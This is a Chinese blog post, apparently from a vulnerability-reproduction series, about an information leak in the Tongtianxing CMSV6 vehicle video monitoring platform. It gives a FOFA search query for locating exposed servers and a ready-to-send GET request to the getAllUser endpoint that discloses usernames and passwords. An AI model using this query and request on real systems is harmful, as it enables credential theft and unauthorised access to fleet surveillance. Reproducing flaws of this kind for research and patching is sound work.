【漏洞复现】通天星CMSV6车载监控平台getAllUser信息泄露漏洞

晚风不及你ღ

于 2024-04-25 09:04:15 发布

阅读量31

点赞数

文章标签： web安全

本文链接：https://blog.csdn.net/qq_37113223/article/details/138175405

版权

【漏洞复现】专栏收录该内容

146 篇文章 1 订阅

已下架不支持订阅

漏洞描述：

通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队，专注于为定位、无线视频终端产品提供平台服务，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。

通天星CMSV6车载视频监控平台存在getAllUser信息泄露漏洞，导致攻击者可以获取账号密码敏感信息。

搜索语法:

Fofa-Query: web.body="/808gps/"

漏洞详情：

1.通天星CMSV6车载视频监控平台。

2.漏洞POC：

GET /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

3.漏洞复现结果。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

晚风不及你ღ

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
【漏洞复现】通天星CMSV6车载监控平台getAllUser信息泄露漏洞

通天星CMSV6车载视频监控平台存在getAllUser信息泄露漏洞，导致攻击者可以获取账号密码敏感信息。
复制链接

扫一扫

专栏目录

已下架不支持订阅

通天星CMSV6车载视频监控平台 SQL注入漏洞复现

0xSec

01-06

1176

通天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS.action接口处存在SQL注入漏洞，未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息，深入利用可获取服务器权限。

【漏洞复现】通天星CMSV6车载监控平台FTP匿名访问

晚风不及你

01-05

624

深圳市通天星科技有限公司，是一家以从事计算机、通信和其他电子设备制造业为主的企业。通天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交通上。

参与评论您还未登录，请先登录后发表或查看评论

【漏洞复现】通天星CMSV6车载监控平台Login弱口令漏洞

晚风不及你

04-25

通天星CMSV6车载视频监控平台存在弱口令漏洞，导致攻击者通过此漏洞登录系统获取敏感信息。

极危！XZ Utils 5.6.0/5.6.1版本恶意后门植入漏洞风险通告

亚信安全官方账号的博客

04-01

1745

前日，亚信安全CERT监测到 XZ Utils 5.6.0、5.6.1版本存在恶意后门植入漏洞。攻击者可能利用该漏洞在受影响的系统上绕过SSH的认证获得未授权访问权限，执行任意代码，请相关用户立即采取安全措施！

通天星CMSV6车载视频监控平台 getImage 任意文件读取漏洞复现

0xSec

02-26

1087

通天星CMSV6车载视频监控平台StandardReportMediaAction_getImage.action接口处任意文件读取漏洞，未经身份认证的攻击者可以通过此漏洞获取系统内部敏感文件信息，使系统处于极不安全状态。

74cms v4.2.X任意文件读取漏洞

09-06

影响版本： 74cms v4.2. 74cms v4.2 74cms v4.2.3 74cms v5.0.1 有任意删除文件漏洞和SQL漏洞，有poc的复现过程。

74cms代码执行漏洞

01-03

74cms代码执行漏洞 docker

CSZ CMS 1.2.X sql注入漏洞

09-07

# （CVE-2019-13086）CSZ CMS 1.2.Xsql注入漏洞 ## 一、漏洞简介 CSZ CMS是一套基于PHP的开源内容管理系统（CMS）。 CSZ CMS 1.2.X版本（2019-06-20之前）中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞...

齐博CMS V7任意文件下载漏洞

09-07

# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py

jfinal 信息咨询网 cms v4.7.1

10-09

jfinal cms是一个java开发的功能强大的信息咨询网站，采用了简洁强大的JFinal作为web框架，模板引擎用的是beetl，数据库用mysql，前端bootstrap框架。支持oauth2认证、帐号注册、密码加密、评

爬虫必须要了解的请求头 user-agent

11-26

5432

前言在现在 Python 最火的时代，有一门技术已经被广泛宣传了 -- 爬虫那爬虫是什么呢？它是按照一定的规则，自动地抓取网络上信息的程序或者脚本举个简单的例子，腾讯新闻网站上，有统计全国各地的疫情情况这些疫情，是怎么汇总的呢？如果只是靠人工手动去收集，那耗费的人力物力将非常的庞大。那具体该怎么做呢？其实，这个就是通过爬虫技术，写好脚本，到国家卫健委的官网上以及各个城市的卫健委的官网上去获取到的数据，然后进行归纳总结。 Ps：爬虫技术好，但是不要去触犯法律哟既然爬虫能获取到网上的各种信息

Python-爬虫基础

Snail的博客

09-18

242

一只小爬虫的开端开篇有些话本章内容实现爬虫的步骤第一步：获取页面第二步：提取所需要的数据第三步：储存数据整体代码开篇有些话爬虫，你创造它，它给予你！我的爬虫是参考着唐松作者的《Python网络爬虫从入门到实践》学习的学习网站：www.santostang.com 本章内容实现爬虫的步骤第一步：获取页面爬虫获取页面的步骤我分为如下几点：明确你所要获取页面的域名 // 本次要获取的页面是：www.santostang.com url ="http://www.santostang.com

通天星CMSV6 车载视频监控平台信息泄露漏洞

weixin_52204925的博客

02-24

1510

通天星CMSV6 车载视频监控平台信息泄露漏洞

【漏洞复现】通天星CMSV6车载监控平台SQL注入漏洞

晚风不及你

01-05

686

通天星CMSV6 车载定位监控平台任意文件上传漏洞复现（XVE-2023-23454）

0xSec

03-31

517

通天星CMSV6 车载定位监控平台upload接口处存在文件上传漏洞，攻击者可通过该漏洞直接上传一个 webshell 到服务器上，获取服务器权限，进⽽控制整个 web 服务器。

【XSS漏洞-01】XSS漏洞原理和危害及验证与分类

02-10

7874

反射型XSS不与数据库进行交互，直接由前端进行反馈；存储型XSS会将恶意代码写进服务器的数据库中；反射型和存储型xss都先将数据发送到了服务器，再从服务器读取数据显示到页面中，burp能抓取到数据；DOM型XSS主要是在浏览器本地修改DOM树而执行，并不会经过服务器，所以burp抓取不到包。

【漏洞复现】通天星CMSV6车载视频监控平台存在文件上传漏洞

https://blog.echo234.cn/

03-27

1218

通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台存在文件上传漏洞。

Web中间件常见漏洞总结

小小猪的博客

11-17

1907

一、IIS中间组件: 1、PUT漏洞 2、短文件名猜解 3、远程代码执行 4、解析漏洞二、Apache中间组件: 1、解析漏洞 2、目录遍历三、Nginx中间组件: 1、文件解析 2、目录遍历 3、CRLF注入 4、目录穿越四、Tomcat中间组件: 1、远程代码执行 2、war后门文件部署五、jBoss中间组件: 1、反序列化漏洞 2、war后门文件部署六、WebLogic中间组件: 1、反序列化漏洞 2、SSRF 3、任意文件上传 4、war后门文

cmsv6 sql注入漏洞

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交